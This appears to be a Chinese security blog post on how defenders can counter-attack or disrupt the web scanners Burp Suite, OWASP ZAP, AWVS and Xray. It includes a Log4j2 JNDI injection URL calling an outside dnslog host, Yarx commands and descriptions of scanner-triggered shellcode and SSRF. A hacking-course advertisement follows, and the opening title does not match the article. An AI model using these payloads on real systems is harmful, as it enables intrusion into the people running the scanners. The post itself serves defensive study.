自动化漏洞检测方案-使用AI调用BurpSuite

第125篇:蓝队溯源之burpsuite、zap、AWVS、xray扫描器反制方法与复现

img

*Part1 前言*

**大家好,。最近我一直在更新蓝队分析取证工具箱中的溯源反制功能,为此阅读了大量相关的技术文章。很多资料提到了早期版本的Burpsuite、OWASP ZAP、AWVS、Xray等扫描器的反制思路,虽然这些方法大多适用于老版本,但其核心思路仍然值得借鉴。经过仔细研究和修正,今天写文章把复现过程和payload分享给大家。

*Part2 技术研究过程*
  • Burpsuite反制方法

Burpsuite的反制方法之一,就是利用其内嵌的Chromium浏览器漏洞执行构造好的shellcode,从而导致burpsuite的使用者的电脑被反制。早期的burpsuite内嵌的Chromium浏览器的无界面模式,通过命令行方式打开网页,常用于自动化漏洞测试、网站爬虫、网站截图、XSS漏洞检测。如下图所示,早期的burpsuite内置的浏览器是chromium。

img

Chromium是由Google主导开发的开源浏览器项目,是Google Chrome的核心代码基础,Chrome谷歌浏览器是谷歌基于开源Chromium 项目制作的商业闭源产品。我们常见的浏览器Microsoft Edge、Brave、Opera、Vivaldi都是基于Chromium的。Burpsuite早期内置的Chromium版本较低,历史上存在多个Nday漏洞,攻击者可以构造特殊的html页面执行shellcode从而获取红队人员PC****电脑的权限

将burpsuite2.0启动,通过进程分析发现,burpsuite对页面进行Reader渲染时,会调用Chromium并附带**–no-sandbox参数,关闭沙盒限制,–headless就是无界面模式。在之后的版本中burpsuit升级使用了chrome.exe作为内嵌浏览器,并且在进程启用时删除了–no-sandbox**参数。所以在后续版本的burpsuite想要利用同样的方法执行恶意的shellcode,必须首先想办法沙盒逃逸。

img

如下图所示,Burpsuite的被动扫描功能默认情况下开了javascript分析引擎扫描javascript漏洞。该功能可以调用内置的浏览器渲染页面,从而触发相关nday浏览器漏洞,从而执行shellcode。

img

大概有三种方式可以触发shellcode。第一种触发方法:使用浏览器挂上burpsuite的代理,被动扫描机制在分析页面的时候,就会造成shellcode执行从而弹出计算器或者上线CS。

img

第二种触发方式在历史记录汇总,只要点击一下“Render”按钮,可以直接弹出计算器。

img

第三种方式会在“Repeater”测试漏洞的时候,点击“Render”渲染页面,会导致弹出计算器的命令。

img

  • OWASP ZAP反制方法

关于OWASP ZAP扫描器的反制问题,主要参考了浅蓝的文章,他的文章给出的思路还是利用其存在的log4j2漏洞,漏洞的利用分为两种情况。

1种方式是主动利用。ZAP扫描器双击运行时,其代理监听端口8080会存在一个HTTP API服务的页面,这个API接口页面存在Log4j2漏洞。该漏洞经过测试,适用于****OWASP ZAP <=2.11.0。访问如下url可以触发红队人员电脑的log4j2漏洞被利用,也可以构造一个页面嵌入如下url,在公司进行浏览或者扫描的时候会被触发log4j2漏洞的利用:

http://127.0.0.1:8080/JSON/acsrf/view/optionPartialMatchingEnabled/?apikey=${jndi:ldap://yrrp5c.dnslog.cn:53/exp}


img

img

2种方式是被动利用。可以构造一个特殊的页面,一旦红队使用 OWASP ZAP 抓包访问该页面,扫描器便可能触发 Log4j2 漏洞,从而被蓝队人员反制。经过浅蓝的文章分析,发现ZAP_2.10.0版本的OWASP ZAP的插件pscanrules-release-*.jar插件存在log4j2漏洞,漏洞触发点如下,log.info方法存在日志拼接,可能存在log4j2漏洞。

img

但是较新一点的2.11.0版本的pscanrules-release-*.jar插件方式变成了占位符的方式,从而杜绝了log4j2漏洞的利用。

img

继续分析代码发现,如果要触发log4j2漏洞,需要构造一个HTTP Digest验证的请求头,并将username的值赋值为log4j2的payload,以备让OWASP ZAP扫描到这个点去触发。

img

最终依据上述代码,我使用python基于flask框架编写一个漏洞测试网页,根据这段漏洞代码,构造如下存在漏洞的页面。

img

使用OWASP ZAP抓包浏览此页面,即可触发log4j2漏洞的利用。

img

如下图所示,dnslog.cn收到dns请求,说明存在漏洞。

img

同样,也可以使用“AJAX Spider”进行爬虫,触发Log4j2漏洞,从而达到反制效果。

img

  • AWVS反制方法

AWVS是众多商业Web漏洞扫描器中,我个人觉得非常好用及具有实战意义的扫描器。目前已知的 AWVS 反制方法主要集中在诱导扫描器执行高资源消耗操作,从而达到拒绝服务DoS或扫描效率瘫痪的效果。其中一种典型思路是利用AWVS在处理JavaScript文件时所使用的老版本解析库Acorn,如v2.6.5版本。该版本的 Acorn 缺乏针对递归深度和语法树节点数量的资源限制机制,存在设计缺陷。蓝队可基于此特性,构造大量无意义的 JavaScript 请求,如通过 for 循环批量嵌入 .get() 请求,使得 AWVS 在解析过程中不得不全量构建复杂的抽象语法树AST。虽然这些代码在浏览器中会因运行异常而快速终止,但扫描器作为静态解析工具,必须完整处理整个结构,进而导致内存异常增长、CPU 占用率飙升,最终拖慢甚至阻断扫描任务的执行。如下图所示,我使用python的flask框架写了一个demo代码。

img

如下图所示,CPU 长时间维持高占用状态,几乎满载,并且扫描任务进度条持续停滞,长时间无法推进。进一步通过 netstat -an 观察网络连接状态发现,AWVS 正在尝试向大量并不存在的目标地址发起连接请求。这些地址多为 JavaScript 文件中伪造构造的 URL,虽然在实际网络中并不可达,但 AWVS 依然将其解析并加入扫描任务队列,导致其不断尝试建立无效连接,最终造成系统资源被持续占用,扫描任务陷入卡顿甚至无法完成的状态。

img

该方法还可以进一步扩展为主动引导型反制策略。例如,蓝队可以将 JS 文件中的请求地址替换为内网常见设备,如路由器、交换机等已知存在远程命令执行RCE漏洞的接口路径,或是包含 Struts2、Log4j2 等框架漏洞的典型 URL。这样一来,一旦红队在目标环境中使用 AWVS 扫描这些页面,扫描器便会自动访问并触发这些特定路径,实质上变成对红队所处内网环境的反向漏洞扫描与攻击行为。

  • Xray反制方法

针对Xray等Web漏洞扫描器的反制手段中,有一种常见思路是通过构造误导性的页面响应内容,干扰其特征匹配机制,从而制造大量误报。Xray****等扫描器的工作原理通常依赖于返回页面中的特定关键字、响应结构、状态码组合等特征来判断漏洞是否存在。因此,如果有意识地在页面中嵌入这些特征,例如:SQL 报错信息、模板注入回显、命令执行提示等,就可以让 Xray 在扫描时误判为存在大量漏洞,最终导致其扫描结果充满误报,从而影响扫描结果,甚至无法继续使用扫描器。

为便于复现这一反制机制,社区中出现了名为 Yarx 的开源工具,名称即为xray的反向拼写。Yarx的核心功能是根据 Xray 所使用的 YAML 格式 POC 规则,自动生成一个符合规则触发条件的模拟服务端。在该模拟服务运行时,任何使用 Xray 对其发起扫描的请求,都将命中预设的漏洞触发逻辑,造成Xray误以为扫描目标存在大量真实漏洞,从而达到误导和反制的目的。使用如下命令,可以启动一个url地址:

.yarx -p ./pocs -l 0.0.0.0:8080


img

接下来使用xray对该地址进行漏洞扫描:

xray webscan --plugins phantasm --html-output yarx.html--url http://192.168.237.1:8001/


img

如下图所示,这是xray最终的扫描报告,发现大量的无意义的漏洞存在。

img

*Part3 总结*

1. 对于扫描器的反制,可利用扫描器内置组件(如浏览器、日志系统)中的 n-day 漏洞实现反制。

2. 对于扫描器的反制,可通过构造伪造响应内容,制造误报干扰扫描结果。

3. 对于扫描器的反制,可引导扫描器发起 SSRF 请求,反打红队所在环境。

4. 未完待续,敬请期待。

黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:

下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!

网络安全的知识多而杂,怎么科学合理安排?

下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!

初级网工
1、网络安全理论知识(2天)

①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)

①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)

①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)

①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)

①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)

①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值